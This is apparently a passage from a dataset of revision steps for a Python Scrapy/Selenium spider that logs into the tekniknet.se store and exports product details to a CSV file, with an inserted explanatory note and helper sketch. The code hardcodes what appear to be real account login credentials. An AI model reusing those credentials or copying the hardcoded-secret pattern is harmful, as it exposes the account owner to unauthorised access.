list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = 
self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath(\n './/a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id(\n 'breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath(\n './/li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = (csv_categories2 + category2.\n text + '/')\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME,\n 'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\n './/a')\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) +\n ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'listProduct'))\n )\n for wrapper3 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath('.//a')\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link3)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for k in range(0, len(list3)):\n try:\n if list3[k] not in old_product_url:\n self.loggger.info('----------------------- ' + str\n (k) + ' ******************************')\n self.driver.get(list3[k])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading3 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock3 non-exist')\n csv_stock = ''\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price3 non-exist')\n csv_price_old = ''\n csv_price_new = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description3 non-exist')\n 
csv_desc = ''\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number3 non-exist')\n
                        csv_article_number = ''\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image3 non-exist')\n
                    if csv_image_url:\n
                        # Pad the scraped image URLs out to the fixed\n
                        # 19-column layout instead of one elif per count.\n
                        image_cols = (csv_image_url[:18] + [' '] * 19)[:19]\n
                        row = ['NEW', csv_article_number,\n
                            list3_categories[k].split('/')[1],\n
                            list3_categories[k].split('/')[2],\n
                            list3_categories[k].split('/')[3],\n
                            csv_heading, csv_desc, csv_price_new,\n
                            csv_price_old] + image_cols + [csv_stock, list3[k]]\n
                        file.write(','.join(row) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error3')\n
        for m in range(0, len(list4)):\n
            try:\n
                if list4[m] not in old_product_url:\n
                    self.loggger.info('********************** ' + str(m) +\n
                        ' ******************************')\n
                    self.driver.get(list4[m])\n
                    WebDriverWait(self.driver, 30).until(EC.\n
                        presence_of_element_located((By.ID, 'breadcrumbs')))\n
                    offer = self.driver.find_element_by_id('productPageUpper')\n
                    try:\n
                        heading = offer.find_element_by_class_name('pHeader')\n
                        csv_heading = heading.text.replace(',', '.')\n
                    except:\n
                        self.loggger.info('heading4 non-exist')\n
                        csv_heading = ''\n
                    try:\n
                        stock = offer.find_element_by_class_name('instock')\n
                        csv_stock = stock.text\n
                    except:\n
                        csv_stock = 'Out of stock'\n
                        self.loggger.info('stock4 non-exist')\n
                    try:\n
                        price_new = offer.find_element_by_class_name('priceRegular')\n
                        csv_price_new = price_new.text.split(' ')[0]\n
                    except:\n
                        try:\n
                            price_new = offer.find_element_by_class_name('priceNew')\n
                            csv_price_new = price_new.text.split(' ')[0]\n
                            price_old = offer.find_element_by_class_name('priceOld')\n
                            csv_price_old = price_old.text.split(' ')[0]\n
                        except:\n
                            self.loggger.info('price4 non-exist')\n
                            csv_price_new = ''\n
                            csv_price_old = ''\n
                    try:\n
                        desc = offer.find_element_by_id('pDesc')\n
                        csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n
                    except:\n
                        self.loggger.info('description4 non-exist')\n
                        csv_desc = ''\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number4 non-exist')\n
                        csv_article_number = ''\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image4 non-exist')\n
                    if csv_image_url:\n
                        image_cols = (csv_image_url[:18] + [' '] * 19)[:19]\n
                        row = ['NEW', csv_article_number,\n
                            list4_categories[m].split('/')[1],\n
                            list4_categories[m].split('/')[2],\n
                            list4_categories[m].split('/')[3],\n
                            csv_heading, csv_desc, csv_price_new,\n
                            csv_price_old] + image_cols + [csv_stock, list4[m]]\n
                        file.write(','.join(row) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error4')\n
        file.close()\n
        self.driver.close()\n",
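Before any scraping starts, parse() demotes the previous run's rows and builds a skip list: the temp-file rewrite flips every 'NEW' marker in tekniknet.csv to 'old', and the last comma-separated field of each row (the product URL) is collected so already-exported products are not scraped again. A self-contained sketch of that incremental-update step, under the same file layout (the function names are illustrative, not from the original):

from os import fdopen, remove
from shutil import move
from tempfile import mkstemp

def demote_new_rows(path='tekniknet.csv'):
    # Rewrite the CSV via a temp file, turning last run's NEW markers into old.
    fh, tmp_path = mkstemp()
    with fdopen(fh, 'w') as new_file, open(path) as old_file:
        for line in old_file:
            new_file.write(line.replace('NEW', 'old'))
    remove(path)
    move(tmp_path, path)

def known_product_urls(path='tekniknet.csv'):
    # The product URL is the last field of every row; a set gives O(1) lookups.
    with open(path) as f:
        return {line.rstrip('\n').split(',')[-1] for line in f}

Two caveats worth noting. First, the original appends line.split(',')[-1] without stripping the trailing newline, so the membership test against the bare product URL never matches and the skip logic is effectively dead; rstrip('\n') as above makes it work. Second, line.replace('NEW', 'old') rewrites the substring anywhere in the row, so a heading or URL containing 'NEW' would be mangled too; restricting the replacement to the first field would be safer.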
"step-4": "import scrapy\nimport time\nimport os.path\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom tempfile import mkstemp\nfrom shutil import move\nfrom os import fdopen, remove\nfrom datetime import datetime\nimport logging\noutput_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')\nlog_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)\n\n\nclass ProductSpider(scrapy.Spider):\n name = 'tekniknet_new'\n allowed_domains = ['www.tekniknet.se']\n start_urls = ['https://www.tekniknet.se/#']\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n csv_image_url = []\n old_product_url = []\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located\n ((By.ID, 'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys('info@themobilestore.se')\n username = self.driver.find_element_by_id('password')\n username.send_keys('order88')\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n fh, abs_path = mkstemp()\n with fdopen(fh, 'w') as new_file:\n with open('tekniknet.csv') as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n remove('tekniknet.csv')\n move(abs_path, 'tekniknet.csv')\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n file = open('tekniknet.csv', 'a', errors='replace')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info(\n '*************************************************')\n self.loggger.info(link1)\n for i in range(0, len(list1) - 4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'\n ):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info(\n '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n )\n self.loggger.info(link2)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 
'categorySubCategories')))\n
                    subcategory = self.driver.find_element_by_id('categorySubCategories')\n
                    wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n
                    for child3 in wrapper2_1:\n
                        link2_1 = child3.get_attribute('href')\n
                        list5.append(link2_1)\n
                    for n in range(0, len(list5)):\n
                        self.driver.get(list5[n])\n
                        WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID, 'categorySubCategories')))\n
                        subcategory = self.driver.find_element_by_id('categorySubCategories')\n
                        wrapper2_1_1 = subcategory.find_elements_by_xpath('.//a')\n
                        for child3_1 in wrapper2_1_1:\n
                            if child3_1.text != 'Visa alla':\n
                                link2_1_1 = child3_1.get_attribute('href')\n
                                list2.append(link2_1_1)\n
                except:\n
                    try:\n
                        breadcrumbs2 = self.driver.find_element_by_id('breadcrumbs')\n
                        categories2 = breadcrumbs2.find_elements_by_xpath('.//li')\n
                        csv_categories2 = ''\n
                        for category2 in categories2:\n
                            csv_categories2 = csv_categories2 + category2.text + '/'\n
                        WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME, 'listProduct')))\n
                        for wrapper2_2 in self.driver.find_elements_by_class_name('listProduct'):\n
                            wrapper2_3 = wrapper2_2.find_element_by_xpath('.//a')\n
                            link2_2 = wrapper2_3.get_attribute('href')\n
                            list4.append(link2_2)\n
                            list4_categories.append(csv_categories2)\n
                            self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n
                            self.loggger.info(link2_2)\n
                    except Exception as e:\n
                        self.loggger.info(e)\n
                        self.loggger.info('error')\n
        for j in range(0, len(list2)):\n
            try:\n
                self.loggger.info('**********-------------- ' + str(j) + ' ******************************')\n
                self.driver.get(list2[j])\n
                WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID, 'breadcrumbs')))\n
                breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n
                categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n
                csv_categories1 = ''\n
                for category1 in categories1:\n
                    csv_categories1 = csv_categories1 + category1.text + '/'\n
                WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME, 'listProduct')))\n
                for wrapper3 in self.driver.find_elements_by_class_name('listProduct'):\n
                    child_wrapper3 = wrapper3.find_element_by_xpath('.//a')\n
                    link3 = child_wrapper3.get_attribute('href')\n
                    list3.append(link3)\n
                    list3_categories.append(csv_categories1)\n
                    self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n
                    self.loggger.info(link3)\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error')\n
        for k in range(0, len(list3)):\n
            try:\n
                if list3[k] not in old_product_url:\n
                    self.loggger.info('----------------------- ' + str(k) + ' ******************************')\n
                    self.driver.get(list3[k])\n
                    WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID, 'breadcrumbs')))\n
                    offer = self.driver.find_element_by_id('productPageUpper')\n
                    try:\n
                        heading = offer.find_element_by_class_name('pHeader')\n
                        csv_heading = heading.text.replace(',', '.')\n
                    except:\n
                        self.loggger.info('heading3 non-exist')\n
                        csv_heading = ''\n
                    try:\n
                        stock = offer.find_element_by_class_name('instock')\n
                        csv_stock = stock.text\n
                    except:\n
                        csv_stock = 'Out of stock'\n
                        self.loggger.info('stock3 non-exist')\n
                    try:\n
                        price_new = offer.find_element_by_class_name('priceRegular')\n
                        csv_price_new = price_new.text.split(' ')[0]\n
                    except:\n
                        try:\n
                            price_new = offer.find_element_by_class_name('priceNew')\n
                            csv_price_new = price_new.text.split(' ')[0]\n
                            price_old = offer.find_element_by_class_name('priceOld')\n
                            csv_price_old = price_old.text.split(' ')[0]\n
                        except:\n
                            self.loggger.info('price3 non-exist')\n
                            csv_price_old = ''\n
                            csv_price_new = ''\n
                    try:\n
                        desc = offer.find_element_by_id('pDesc')\n
                        csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n
                    except:\n
                        self.loggger.info('description3 non-exist')\n
                        csv_desc = ''\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number3 non-exist')\n
                        csv_article_number = ''\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image3 non-exist')\n
                    if csv_image_url:\n
                        cats = list3_categories[k].split('/')\n
                        images = (csv_image_url + [' '] * 18)[:18]\n
                        file.write(','.join(['NEW', csv_article_number, cats[1], cats[2], cats[3], csv_heading, csv_desc, csv_price_new, csv_price_old] + images + [' ', csv_stock, list3[k]]) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error3')\n
        for m in range(0, len(list4)):\n
            try:\n
                if list4[m] not in old_product_url:\n
                    self.loggger.info('********************** ' + str(m) + ' ******************************')\n
                    self.driver.get(list4[m])\n
                    WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID, 'breadcrumbs')))\n
                    offer = self.driver.find_element_by_id('productPageUpper')\n
                    try:\n
                        heading = offer.find_element_by_class_name('pHeader')\n
                        csv_heading = heading.text.replace(',', '.')\n
                    except:\n
                        self.loggger.info('heading4 non-exist')\n
                        csv_heading = ''\n
                    try:\n
                        stock = offer.find_element_by_class_name('instock')\n
                        csv_stock = stock.text\n
                    except:\n
                        csv_stock = 'Out of stock'\n
                        self.loggger.info('stock4 non-exist')\n
                    try:\n
                        price_new = offer.find_element_by_class_name('priceRegular')\n
                        csv_price_new = price_new.text.split(' ')[0]\n
                    except:\n
                        try:\n
                            price_new = offer.find_element_by_class_name('priceNew')\n
                            csv_price_new = price_new.text.split(' ')[0]\n
                            price_old = offer.find_element_by_class_name('priceOld')\n
                            csv_price_old = price_old.text.split(' ')[0]\n
                        except:\n
                            self.loggger.info('price4 non-exist')\n
                            csv_price_new = ''\n
                            csv_price_old = ''\n
                    try:\n
                        desc = offer.find_element_by_id('pDesc')\n
                        csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n
                    except:\n
                        self.loggger.info('description4 non-exist')\n
                        csv_desc = ''\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number4 non-exist')\n
                        csv_article_number = ''\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image4 non-exist')\n
                    if csv_image_url:\n
                        cats = list4_categories[m].split('/')\n
                        images = (csv_image_url + [' '] * 18)[:18]\n
                        file.write(','.join(['NEW', csv_article_number, cats[1], cats[2], cats[3], csv_heading, csv_desc, csv_price_new, csv_price_old] + images + [' ', csv_stock, list4[m]]) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error4')\n
        file.close()\n
        self.driver.close()\n",
"step-5": "import scrapy\nimport time\nimport os.path\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom tempfile import mkstemp\nfrom shutil import move\nfrom os import fdopen, remove\n\nfrom datetime import datetime\nimport logging\n\noutput_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')\nlog_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)\n\nclass ProductSpider(scrapy.Spider):\n name = \"tekniknet_new\"\n allowed_domains = ['www.tekniknet.se']\n start_urls = ['https://www.tekniknet.se/#']\n\n def __init__(self):\n # self.driver = webdriver.Chrome(\"./chromedriver.exe\")\n options = webdriver.ChromeOptions()\n # options.add_argument(\"--headless\")\n options.add_argument(\"--start-maximized\")\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n # Quiet down all the unnecessary logging. \n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n \n logging.getLogger('selenium.webdriver.remote.remote_connection').setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\n logging.getLogger('selenium.webdriver.remote.remote_connection').addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n # article_number_list = []\n csv_image_url = []\n # file_exist = False\n old_product_url = []\n \n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys(\"info@themobilestore.se\")\n username = self.driver.find_element_by_id('password')\n username.send_keys(\"order88\")\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n\n #Create temp file\n fh, abs_path = mkstemp()\n with fdopen(fh,'w') as new_file:\n with open(\"tekniknet.csv\") as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n #Remove original file\n remove(\"tekniknet.csv\")\n #Move new file\n move(abs_path, \"tekniknet.csv\")\n\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n\n file = open(\"tekniknet.csv\", \"a\", errors ='replace')\n # file.write('OLD/NEW' + ',' + 'article number' + ',' + 'category1' + ',' + 'category2' + ',' + 'category3' + ',' + 'heading' + ',' + 'description' + ',' + 'current price' + ',' + 'previous price' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'EAN code' + ',' + 'stock' + ',' + 'product url' + '\\n')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 
= child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info('*************************************************')\n self.loggger.info(link1)\n\n for i in range(0, len(list1)-4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n self.loggger.info(link2)\n \n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))\n subcategory = self.driver.find_element_by_id('categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))\n subcategory = self.driver.find_element_by_id('categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath('.//a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id('breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath('.//li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = csv_categories2 + category2.text + '/'\n \n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name('listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\".//a\")\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n\n # for m in range(0, 5): IF YOU WANT TO DOWNLOAD CERTAIN PRODUCTS, YOU CAN WRITE LIKE THIS.\n # for m in range(0, len(list2)): IF YOU WANT TO DOWNLOAD ALL PRODUCTS, YOU CAN WRITE LIKE THIS.\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) + ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))\n\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))\n for wrapper3 in self.driver.find_elements_by_class_name('listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath(\".//a\")\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n self.loggger.info(link3)\n except Exception as 
\n
        for k in range(0, len(list3)):\n
            try:\n
                if list3[k] not in old_product_url:\n
                    self.loggger.info('----------------------- ' + str(k) + ' ******************************')\n
                    self.driver.get(list3[k])\n
                    WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID, 'breadcrumbs')))\n
\n
                    offer = self.driver.find_element_by_id('productPageUpper')\n
                    try:\n
                        heading = offer.find_element_by_class_name('pHeader')\n
                        csv_heading = heading.text.replace(',', '.')\n
                    except:\n
                        self.loggger.info('heading3 non-exist')\n
                        csv_heading = ''\n
\n
                    try:\n
                        stock = offer.find_element_by_class_name('instock')\n
                        csv_stock = stock.text\n
                    except:\n
                        csv_stock = 'Out of stock'\n
                        self.loggger.info('stock3 non-exist')\n
\n
                    try:\n
                        price_new = offer.find_element_by_class_name('priceRegular')\n
                        csv_price_new = price_new.text.split(' ')[0]\n
                    except:\n
                        try:\n
                            price_new = offer.find_element_by_class_name('priceNew')\n
                            csv_price_new = price_new.text.split(' ')[0]\n
\n
                            price_old = offer.find_element_by_class_name('priceOld')\n
                            csv_price_old = price_old.text.split(' ')[0]\n
                        except:\n
                            self.loggger.info('price3 non-exist')\n
                            csv_price_old = ''\n
                            csv_price_new = ''\n
\n
                    try:\n
                        desc = offer.find_element_by_id('pDesc')\n
                        csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n
                    except:\n
                        self.loggger.info('description3 non-exist')\n
                        csv_desc = ''\n
\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number3 non-exist')\n
                        csv_article_number = ''\n
\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image3 non-exist')\n
\n
                    ######################################### CSV File Writing #########################################\n
                    # One row per product: 9 leading fields, 18 image columns padded\n
                    # with blanks, a blank EAN column, stock and the product url.\n
                    if csv_image_url:\n
                        cats = list3_categories[k].split('/')\n
                        images = (csv_image_url + [' '] * 18)[:18]\n
                        file.write(','.join(['NEW', csv_article_number, cats[1], cats[2], cats[3], csv_heading, csv_desc, csv_price_new, csv_price_old] + images + [' ', csv_stock, list3[k]]) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error3')\n
\n
        # for m in range(0, 20): IF YOU WANT TO DOWNLOAD CERTAIN PRODUCTS, YOU CAN WRITE LIKE THIS.\n
        # for m in range(0, len(list4)): IF YOU WANT TO DOWNLOAD ALL PRODUCTS, YOU CAN WRITE LIKE THIS.\n
        for m in range(0, len(list4)):\n
            try:\n
                if list4[m] not in old_product_url:\n
                    self.loggger.info('********************** ' + str(m) + ' ******************************')\n
                    self.driver.get(list4[m])\n
                    WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID, 'breadcrumbs')))\n
\n
                    offer = self.driver.find_element_by_id('productPageUpper')\n
                    try:\n
                        heading = offer.find_element_by_class_name('pHeader')\n
                        csv_heading = heading.text.replace(',', '.')\n
                    except:\n
                        self.loggger.info('heading4 non-exist')\n
                        csv_heading = ''\n
\n
                    try:\n
                        stock = offer.find_element_by_class_name('instock')\n
                        csv_stock = stock.text\n
                    except:\n
                        csv_stock = 'Out of stock'\n
                        self.loggger.info('stock4 non-exist')\n
\n
                    try:\n
                        price_new = offer.find_element_by_class_name('priceRegular')\n
                        csv_price_new = price_new.text.split(' ')[0]\n
                    except:\n
                        try:\n
                            price_new = offer.find_element_by_class_name('priceNew')\n
                            csv_price_new = price_new.text.split(' ')[0]\n
\n
